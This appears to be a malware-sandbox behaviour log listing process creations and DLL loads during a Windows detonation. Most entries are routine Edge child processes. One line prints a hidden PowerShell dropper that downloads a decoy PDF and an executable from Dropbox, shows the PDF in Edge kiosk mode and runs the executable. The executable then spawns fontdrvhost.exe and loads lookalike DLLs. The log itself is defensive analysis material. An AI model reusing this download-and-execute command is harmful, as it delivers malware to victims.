                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6520 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6808 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=5004 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=5004 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7388 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=8888 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:6Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6816 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:8Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\1225428425.pdf
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\1718218388.exe "C:\Users\user\AppData\Local\Temp\1718218388.exe"
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=2108,i,10734861475087244222,18214222288503595443,262144 /prefetch:3
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeProcess created: C:\Users\user\AppData\Local\Temp\1718218388.exe "C:\Users\user\AppData\Local\Temp\1718218388.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeSection loaded: wsock32.dll
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeSection loaded: k7rn7l32.dll
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeSection loaded: ntd3ll.dll
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: umpdc.dll
